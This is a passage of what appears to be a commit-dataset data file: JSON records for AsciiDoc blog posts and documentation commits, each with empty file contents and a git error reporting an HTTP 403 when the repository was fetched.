2015-07-02-Perl.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-02-Perl.adoc","new_file":"_posts\/2015-07-02-Perl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"997422ede75dc50f07ecfa4ba036d4e59ac00291","subject":"Update 2016-03-18-Test.adoc","message":"Update 2016-03-18-Test.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Test.adoc","new_file":"_posts\/2016-03-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1475f3f79bfc967ca6fabaf79cfc9aaf4d0f39de","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2016c1d4bd074a5edb003fef153db89e4be55cf","subject":"Update 2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","message":"Update 2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","new_file":"_posts\/2015-04-20-Inyeccion-de-Dependencias-con-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556204a6774f61a9946a23547c927e237d53308a","subject":"Update 2016-11-24-Co-working-co-living-remote-nomad.adoc","message":"Update 2016-11-24-Co-working-co-living-remote-nomad.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2016-11-24-Co-working-co-living-remote-nomad.adoc","new_file":"_posts\/2016-11-24-Co-working-co-living-remote-nomad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c0901acba5f3b8fadb39ca0abc781d05b57817","subject":"Delete the file at '_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc'","message":"Delete the file at '_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc'","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_file":"_posts\/2017-07-15-Number-letter-count-Projeto-Euler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f3fd032d1b89be03b19dbb6242a431fc5884811","subject":"y2b create post OtterBox Defender for iPhone 4S Unboxing \\u0026 Review","message":"y2b create post OtterBox Defender for iPhone 4S Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-25-OtterBox-Defender-for-iPhone-4S-Unboxing-u0026-Review.adoc","new_file":"_posts\/2012-01-25-OtterBox-Defender-for-iPhone-4S-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28086d728996c1e1045db502a837b28644530574","subject":"Update 2017-09-18-Adding-custom-domain-to-hubpress.adoc","message":"Update 2017-09-18-Adding-custom-domain-to-hubpress.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc","new_file":"_posts\/2017-09-18-Adding-custom-domain-to-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e40d5272e51ffb91a8afd8485fddd88d21b4acfe","subject":"Update 2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","message":"Update 2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","new_file":"_posts\/2017-06-12-Es-posible-dormir-menos-de-ocho-horas-Mas-Sano-33.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be4ac9b2748f4b921c0e4038328f96bb8d025464","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a675aae8a0691e621cfadd8f1ff998ce36d0e551","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9593b9d0b6d5419b65cd3f5607df6f72e2365a45","subject":"Update 
2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0849a2cc24ee96fa2afcef8da3baab0f1ba4e9a5","subject":"Update 2016-10-17-Divisors-and-Things.adoc","message":"Update 2016-10-17-Divisors-and-Things.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-17-Divisors-and-Things.adoc","new_file":"_posts\/2016-10-17-Divisors-and-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b66dfb8abfa216b088136929dd589463163ed98","subject":"Update 2016-09-11-Computer-Science-Actually-Doing-Things.adoc","message":"Update 2016-09-11-Computer-Science-Actually-Doing-Things.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-11-Computer-Science-Actually-Doing-Things.adoc","new_file":"_posts\/2016-09-11-Computer-Science-Actually-Doing-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6150c077644b047aa11b750ec615bac5b6f19e80","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"671d4f65449c2f08db04c75f3fb5e95df5f4d11a","subject":"Added org.killbill.subscription.align.effectiveDateForExistingSubscriptions","message":"Added org.killbill.subscription.align.effectiveDateForExistingSubscriptions","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/platform\/includes\/killbill-configuration-properties-table.adoc","new_file":"userguide\/platform\/includes\/killbill-configuration-properties-table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18739adae71ad6b637892492b4cf9111b05348cb","subject":"write(race-delay-timeout): cancelableXHR\u306eNode.js\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0","message":"write(race-delay-timeout): 
cancelableXHR\u306eNode.js\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0\n\n\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u3057\u3066\u5206\u3051\u308b\u3053\u3068\u3067\u3072\u3068\u3064\u306e\u95a2\u6570\u304c\u3084\u308b\u5f79\u5272\u3092\u5c0f\u3055\u304f\u3059\u308b\u4e8b\u306b\u3064\u3044\u3066\n","repos":"mzbac\/promises-book,wenber\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,azu\/promises-book,azu\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,sunfurong\/promise,azu\/promises-book,cqricky\/promises-book,liubin\/promises-book,mzbac\/promises-book,sunfurong\/promise,dieface\/promises-book,wenber\/promises-book,cqricky\/promises-book,wenber\/promises-book,genie88\/promises-book,oToUC\/promises-book,liubin\/promises-book,mzbac\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,azu\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book","old_file":"Ch4_AdvancedPromises\/race-delay-timeout.adoc","new_file":"Ch4_AdvancedPromises\/race-delay-timeout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f1f376ebb4b6205c6f2ed604671fe67856a25e4","subject":"Correct a spelling mistake","message":"Correct a spelling mistake","repos":"apiman\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman,msavy\/apiman,apiman\/apiman-guides,msavy\/apiman,apiman\/apiman,msavy\/apiman,ssogabe\/apiman-guides,apiman\/apiman,msavy\/apiman-guides,msavy\/apiman","old_file":"user-guide\/en-US\/Introduction.asciidoc","new_file":"user-guide\/en-US\/Introduction.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"821660e3fc7b1fa80125583c75f60cd139f53990","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4893785353180d34fc3218b45db5f2ab45564582","subject":"Deleted 2016-6-26-PHRER-array-merge.adoc","message":"Deleted 2016-6-26-PHRER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER-array-merge.adoc","new_file":"2016-6-26-PHRER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aca4df911eb4aaa80cf865388ed4d5aac2aad93c","subject":"Update 2015-12-20-Koder-Pt-1.adoc","message":"Update 2015-12-20-Koder-Pt-1.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2015-12-20-Koder-Pt-1.adoc","new_file":"_posts\/2015-12-20-Koder-Pt-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6b0caf115bde7a9d7ba78f8da4d8d93fca07b5","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced5625de4c62df4b89c28df791a4a753de60ae4","subject":"Update 2018-11-11-Selenium-1.adoc","message":"Update 2018-11-11-Selenium-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Selenium-1.adoc","new_file":"_posts\/2018-11-11-Selenium-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9526ac95ec16e722596bdd73bd453fb09a731e5a","subject":"Added Graceful Shutdown docs","message":"Added Graceful Shutdown 
docs\n","repos":"tdiesler\/camel,objectiser\/camel,DariusX\/camel,onders86\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel,onders86\/camel,tadayosi\/camel,davidkarlsen\/camel,onders86\/camel,mcollovati\/camel,tdiesler\/camel,apache\/camel,zregvart\/camel,punkhorn\/camel-upstream,adessaigne\/camel,mcollovati\/camel,pmoerenhout\/camel,objectiser\/camel,ullgren\/camel,onders86\/camel,Fabryprog\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,alvinkwekel\/camel,mcollovati\/camel,punkhorn\/camel-upstream,apache\/camel,nicolaferraro\/camel,zregvart\/camel,cunningt\/camel,adessaigne\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,gnodet\/camel,kevinearls\/camel,pmoerenhout\/camel,pax95\/camel,gnodet\/camel,CodeSmell\/camel,kevinearls\/camel,DariusX\/camel,christophd\/camel,kevinearls\/camel,kevinearls\/camel,apache\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,tadayosi\/camel,pax95\/camel,CodeSmell\/camel,CodeSmell\/camel,zregvart\/camel,pax95\/camel,zregvart\/camel,tadayosi\/camel,punkhorn\/camel-upstream,christophd\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel,onders86\/camel,onders86\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,alvinkwekel\/camel,nicolaferraro\/camel,apache\/camel,davidkarlsen\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,gnodet\/camel,pax95\/camel,nicolaferraro\/camel,kevinearls\/camel,DariusX\/camel,cunningt\/camel,ullgren\/camel,adessaigne\/camel,adessaigne\/camel,pmoerenhout\/camel,alvinkwekel\/camel,tadayosi\/camel,CodeSmell\/camel,gnodet\/camel,christophd\/camel,kevinearls\/camel,Fabryprog\/camel,Fabryprog\/camel,gnodet\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,DariusX\/camel,tadayosi\/camel,christophd\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,cunningt\/camel,ullgren\/camel,alvinkwekel\/camel,objectiser\/camel,ullgren\/camel","old_file":"docs\/user-manual\/en\/graceful-shutdown.adoc","new_file":"docs\/user-manual\/en\/graceful-shutdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d9ceb634c08075180da74c6d420c69d5c69a017","subject":"Update 2012-10-02-CREATE-Meetup-nameGraph-DB-Meetup-locationSot-Paris.adoc","message":"Update 2012-10-02-CREATE-Meetup-nameGraph-DB-Meetup-locationSot-Paris.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2012-10-02-CREATE-Meetup-nameGraph-DB-Meetup-locationSot-Paris.adoc","new_file":"_posts\/2012-10-02-CREATE-Meetup-nameGraph-DB-Meetup-locationSot-Paris.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48a1168acb4f0c27ad9081b4a60df957f88ea14a","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/example_ethernet_echo\/README.adoc","new_file":"examples\/example_ethernet_echo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a035ca0dc57e77ce3b38af52ed4f7c5c37407d8f","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d3b607569e88bc3d440ba06913b97285888c72f","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffebe6f88c2d3abfda0393e57f8f68dcd84bc0bf","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e882aaf0f3c53670baf907aecd85e2758b9c1ec6","subject":"Update 2015-06-18-imagecoffee-apple-iphone-laptopjpg.adoc","message":"Update 2015-06-18-imagecoffee-apple-iphone-laptopjpg.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-imagecoffee-apple-iphone-laptopjpg.adoc","new_file":"_posts\/2015-06-18-imagecoffee-apple-iphone-laptopjpg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dcf9d35de56ef20b1ed5d739aba92b2289e5a34","subject":"Update 2016-11-11-Lo-que-puse-en-Twitter-el-11112016.adoc","message":"Update 2016-11-11-Lo-que-puse-en-Twitter-el-11112016.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-11-Lo-que-puse-en-Twitter-el-11112016.adoc","new_file":"_posts\/2016-11-11-Lo-que-puse-en-Twitter-el-11112016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f4f1b6f9fb1015f39cd9c663561002ebe6d8d78","subject":"y2b create post I've Never Seen A Speaker Like This...","message":"y2b create post I've Never Seen A Speaker Like 
This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-24-Ive-Never-Seen-A-Speaker-Like-This.adoc","new_file":"_posts\/2017-06-24-Ive-Never-Seen-A-Speaker-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d3685a158e695704be3e784630736b2f3250ec0","subject":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","message":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c22e179e874e654c5e31c2cb258ee737ecfd6fa6","subject":"Docs: Documented cancelation of shard recovery","message":"Docs: Documented cancelation of shard recovery\n\nRelates to #12421","repos":"adrianbk\/elasticsearch,tkssharma\/elasticsearch,likaiwalkman\/elasticsearch,EasonYi\/elasticsearch,kunallimaye\/elasticsearch,gfyoung\/elasticsearch,kcompher\/elasticsearch,kaneshin\/elasticsearch,djschny\/elasticsearch,scorpionvicky\/elasticsearch,btiernay\/elasticsearch,strapdata\/elassandra5-rc,uschindler\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,dataduke\/elasticsearch,uschindler\/elasticsearch,mjhennig\/elasticsearch,KimTaehee\/elasticsearch,MetSystem\/elasticsearch,pranavraman\/elasticsearch,mapr\/elasticsearch,Siddartha07\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,MisterAndersen\/elasticsearch,bawse\/elasticsearch,Charlesdong\/elasticsearch,Shepard1212\/elasticsearch,andrestc\/elasticsearch,girirajsharma\/elasticsearch,zeroctu\/elasticsearch,EasonYi\/elasticsearch,areek\/elasticsearch,mm0\/elasticsearch,polyfractal\/elasticsearch,zeroctu\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,jimhooker2002\/elasticsearch,LewayneNaidoo\/elasticsearch,sdauletau\/elasticsearch,kunallimaye\/elasticsearch,lydonchandra\/elasticsearch,jpountz\/elasticsearch,fernandozhu\/elasticsearch,PhaedrusTheGreek\/elasticsearch,truemped\/elasticsearch,markharwood\/elasticsearch,mute\/elasticsearch,kenshin233\/elasticsearch,TonyChai24\/ESSource,MetSystem\/elasticsearch,KimTaehee\/elasticsearch,franklanganke\/elasticsearch,infusionsoft\/elasticsearch,Charlesdong\/elasticsearch,Siddartha07\/elasticsearch,sposam\/elasticsearch,kalimatas\/elasticsearch,vietlq\/elasticsearch,huanzhong\/elasticsearch,nknize\/elasticsearch,sc0ttkclark\/elasticsearch,xuzha\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,MetSystem\/elasticsearch,MjAbuz\/elasticsearch,caengcjd\/elasticsearch,njlawton\/elasticsearch,elancom\/elasticsearch,snikch\/elasticsearch,xingguang2013\/elasticsearch,iamjakob\/elasticsearch,mcku\/elasticsearch,kcompher\/elasticsearch,sarwarbhuiyan\/elasticsearch,polyfractal\/elasticsearch,lydonchandra\/elasticsearch,yongminxia\/elasticsearch,KimTaehee\/elasticsearch,jprante\/elasti
csearch,drewr\/elasticsearch,mute\/elasticsearch,rhoml\/elasticsearch,ulkas\/elasticsearch,Rygbee\/elasticsearch,lmtwga\/elasticsearch,fekaputra\/elasticsearch,caengcjd\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,schonfeld\/elasticsearch,ivansun1010\/elasticsearch,tsohil\/elasticsearch,rmuir\/elasticsearch,iacdingping\/elasticsearch,Stacey-Gammon\/elasticsearch,tahaemin\/elasticsearch,lchennup\/elasticsearch,infusionsoft\/elasticsearch,gmarz\/elasticsearch,wuranbo\/elasticsearch,pritishppai\/elasticsearch,jeteve\/elasticsearch,mgalushka\/elasticsearch,acchen97\/elasticsearch,andrestc\/elasticsearch,socialrank\/elasticsearch,kunallimaye\/elasticsearch,obourgain\/elasticsearch,weipinghe\/elasticsearch,obourgain\/elasticsearch,EasonYi\/elasticsearch,wittyameta\/elasticsearch,HarishAtGitHub\/elasticsearch,i-am-Nathan\/elasticsearch,kalburgimanjunath\/elasticsearch,jpountz\/elasticsearch,wuranbo\/elasticsearch,andrestc\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,davidvgalbraith\/elasticsearch,jchampion\/elasticsearch,Shekharrajak\/elasticsearch,onegambler\/elasticsearch,mmaracic\/elasticsearch,F0lha\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,rajanm\/elasticsearch,springning\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,Shepard1212\/elasticsearch,Shekharrajak\/elasticsearch,strapdata\/elassandra-test,cnfire\/elasticsearch-1,springning\/elasticsearch,pablocastro\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,djschny\/elasticsearch,achow\/elasticsearch,infusionsoft\/elasticsearch,Chhunlong\/elasticsearch,vietlq\/elasticsearch,zeroctu\/elasticsearch,bestwpw\/elasticsearch,hydro2k\/elasticsearch,naveenhooda2000\/elasticsearch,apepper\/elasticsearch,nomoa\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,MjAbuz\/elasticsearch,robin13\/elasticsearch,springning\/elasticsearch,Chhunlong\/elasticsearch,elasticdog\/elasticsearch,fekaputra\/elasticsearch,knight1128\/elasticsearch,Chhunlong\/elasticsearch,MetSystem\/elasticsearch,rento19962\/elasticsearch,hafkensite\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,jango2015\/elasticsea